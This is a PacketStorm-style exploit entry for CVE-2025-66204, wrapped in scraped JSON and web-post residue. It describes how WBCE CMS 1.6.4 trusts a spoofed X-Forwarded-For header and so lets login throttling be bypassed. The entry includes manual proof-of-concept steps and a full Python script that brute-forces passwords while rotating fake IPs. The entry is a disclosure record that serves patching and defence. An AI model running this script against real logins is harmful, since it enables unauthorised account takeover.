{“lastseen”:”2026-04-13T16:18:19″,”description”:”WBCE CMS versions 1.6.4 suffers from a brute force protection bypass vulnerability…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force”,”source”:””,”references”:””,”id”:”PACKETSTORM:218798″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-66204″],”sourceData”:”# CVE-2025-66204: WBCE CMS allows brute-force protection bypass using X-Forwarded-For header\\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2025-66204](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-66204) |\\n | **Severity** | MEDIUM |\\n | **Advisory** | [View Advisory](https:\/\/github.com\/WBCE\/WBCE_CMS\/security\/advisories\/GHSA-f676-f375-m7mw) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **WBCE\/WBCE_CMS**\\n \\n \\n \\n ## Details\\n \\n ### Summary\\n A brute-force protection bypass exists in WBCE CMS 1.6.4.\\n The login throttling mechanism blocks an IP address after 5 invalid login attempts.\\n However, the application fully trusts the X-Forwarded-For header without validating it or restricting its usage.\\n \\n By modifying X-Forwarded-For on each request, an attacker can reset the counter indefinitely and gain unlimited password guessing attempts, effectively bypassing all brute-force protection.\\n \\n ### Details\\n WBCE CMS determines the client IP using the following logic:\\n \\n 1. If the request contains the header X-Forwarded-For, the application blindly trusts its value.\\n 2. Otherwise, it falls back to REMOTE_ADDR.\\n \\n Although WBCE is not running behind a reverse proxy by default, the login endpoint still parses X-Forwarded-For whenever it is present, even if added manually by the client.\\n \\n Because the application does not verify that the request originates from a trusted proxy, an attacker can inject their own X-Forwarded-For header with any arbitrary IP address.\\n \\n This results in:\\n \\n – the attacker sends 5 invalid passwords using X-Forwarded-For: 10.0.0.1 \u2192 that IP is blocked\\n – attacker sends next request with X-Forwarded-For: 10.0.0.2 \u2192 treated as a completely new IP\\n – brute-force protection can be bypassed indefinitely\\n \\n This behavior is reproducible on a clean, default installation with no reverse proxy in front of WBCE CMS.\\n \\n ### PoC\\n Steps\\n \\n Attempt login with wrong password and send header:\\n \\n X-Forwarded-For: 10.0.0.10\\n \\n Repeat until lockout occurs (after 5 attempts).\\n \\u003cimg width=\\”1905\\” height=\\”845\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/69b40271-21ba-48eb-8b14-912087a0a6c2\\” \/\\u003e\\n \\n Change header to:\\n \\n X-Forwarded-For: 10.0.0.11\\n \\n Login attempts are reset and allowed again.\\n \\u003cimg width=\\”1912\\” height=\\”921\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/bbdad8f5-c7c4-467e-b5f8-fb0650660b4c\\” \/\\u003e\\n \\n \\n Rotate through 10.0.0.x and brute-force without any limitation.\\n \\n Automated PoC Script\\n \\n I built a Python script that performs the attack automatically, rotating spoofed IPs every four attempts and detecting successful login.\\n \\n \\u003cimg width=\\”538\\” height=\\”406\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/ed526674-aa39-4e7b-9f9a-21ac17309525\\” \/\\u003e\\n …\\n \\u003cimg width=\\”588\\” height=\\”361\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/b522c8a8-1905-44c8-a3c3-46fc93042ee8\\” \/\\u003e\\n \\n \\u003cimg width=\\”445\\” height=\\”477\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/ba89bb3c-9bee-44c9-9db1-46d5877e40d8\\” \/\\u003e\\n \\n This proves complete bypass of the protection.\\n \\n “`python\\n import requests\\n \\n # ==========================\\n # CONFIGURATION\\n # ==========================\\n \\n TARGET_URL = \\”http:\/\/localhost\/wbce\/admin\/login\/index.php\\”\\n USERNAME = \\”user\\”\\n \\n # Extracted from intercepted login request\\n USERNAME_FIELDNAME = \\”username_A9BC72FF1D81\\”\\n PASSWORD_FIELDNAME = \\”password_A9BC72FF1D81\\”\\n USERNAME_META_FIELD = \\”username_fieldname\\”\\n PASSWORD_META_FIELD = \\”password_fieldname\\”\\n \\n WORDLIST = \\”wordlist.txt\\”\\n \\n ERROR_STRING = \\”Loginname or password incorrect\\”\\n BLOCK_STRING = \\”Excessive Invalid Logins\\”\\n \\n MAX_ATTEMPTS_PER_IP = 4\\n SPOOF_IP_BASE = \\”10.0.0.\\”\\n \\n # Optional Burp Suite proxy\\n USE_BURP = False\\n PROXIES = {\\n \\”http\\”: \\”http:\/\/127.0.0.1:8080\\”,\\n \\”https\\”: \\”http:\/\/127.0.0.1:8080\\”,\\n }\\n \\n session = requests.Session()\\n if USE_BURP:\\n session.proxies.update(PROXIES)\\n session.verify = False\\n \\n \\n # ==========================\\n # LOGIN REQUEST\\n # ==========================\\n \\n def try_login(ip, password):\\n \\”\\”\\”Send one login attempt with spoofed X-Forwarded-For.\\”\\”\\”\\n headers = {\\n \\”X-Forwarded-For\\”: ip,\\n \\”User-Agent\\”: \\”WBCE-Bruteforce-POC\\”,\\n }\\n \\n data = {\\n USERNAME_META_FIELD: USERNAME_FIELDNAME,\\n PASSWORD_META_FIELD: PASSWORD_FIELDNAME,\\n USERNAME_FIELDNAME: USERNAME,\\n PASSWORD_FIELDNAME: password,\\n \\”url\\”: \\”\\”,\\n \\”submit\\”: \\”Login\\”,\\n }\\n \\n resp = session.post(TARGET_URL, headers=headers, data=data, allow_redirects=True)\\n text = resp.text\\n \\n failed = ERROR_STRING in text\\n blocked = BLOCK_STRING in text\\n success = not failed and not blocked\\n \\n return success, failed, blocked, resp\\n \\n \\n # ==========================\\n # MAIN ROUTINE\\n # ==========================\\n \\n def main():\\n print(\\”[*] Loading wordlist…\\”)\\n \\n with open(WORDLIST, \\”r\\”, encoding=\\”utf-8\\”) as f:\\n passwords = [p.strip() for p in f if p.strip()]\\n \\n print(f\\”[*] Loaded {len(passwords)} passwords.\\\\n\\”)\\n \\n current_ip_counter = 1\\n attempts_with_ip = 0\\n \\n for attempt_no, password in enumerate(passwords, start=1):\\n ip = f\\”{SPOOF_IP_BASE}{current_ip_counter}\\”\\n success, failed, blocked, resp = try_login(ip, password)\\n \\n print(\\n f\\”Attempt {attempt_no:03d} | IP={ip} | pass='{password}’ \\”\\n f\\”| failed={failed} blocked={blocked}\\”\\n )\\n \\n if success:\\n print(\\”\\\\n[+] SUCCESSFUL LOGIN!\\”)\\n print(f\\” Username: {USERNAME}\\”)\\n print(f\\” Password: {password}\\”)\\n print(f\\” IP used : {ip}\\”)\\n return\\n \\n attempts_with_ip += 1\\n \\n # Switch spoofed IP after lockout threshold\\n if attempts_with_ip \\u003e= MAX_ATTEMPTS_PER_IP:\\n print(f\\”[*] Switching IP after {MAX_ATTEMPTS_PER_IP} attempts.\\\\n\\”)\\n current_ip_counter += 1\\n attempts_with_ip = 0\\n \\n print(\\”\\\\n[-] Password not found in wordlist.\\”)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\n “`\\n \\n ### Impact\\n 1. Unlimited brute-forcing of any account;\\n 2. Possible compromise of administrator accounts;\\n 3. No rate-limiting enforcement;\\n \\n ## References\\n \\n – https:\/\/github.com\/WBCE\/WBCE_CMS\/security\/advisories\/GHSA-f676-f375-m7mw\\n – https:\/\/github.com\/WBCE\/WBCE_CMS\/commit\/3765baddf27f31bbbea9c0228c452268621b25e5\\n – https:\/\/github.com\/WBCE\/WBCE_CMS\/releases\/tag\/1.6.5\\n \\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218798″,”cvss”:{“score”:8.1,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:H\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218798\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-13T16:18:19″,”description”:”WBCE CMS versions 1.6.4 suffers from a brute force protection bypass vulnerability…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force”,”source”:””,”references”:””,”id”:”PACKETSTORM:218798″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-66204″],”sourceData”:”# CVE-2025-66204: WBCE CMS allows brute-force protection bypass using…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,52,12,15,13,53,7,11,5],"class_list":["post-46307","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-81","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n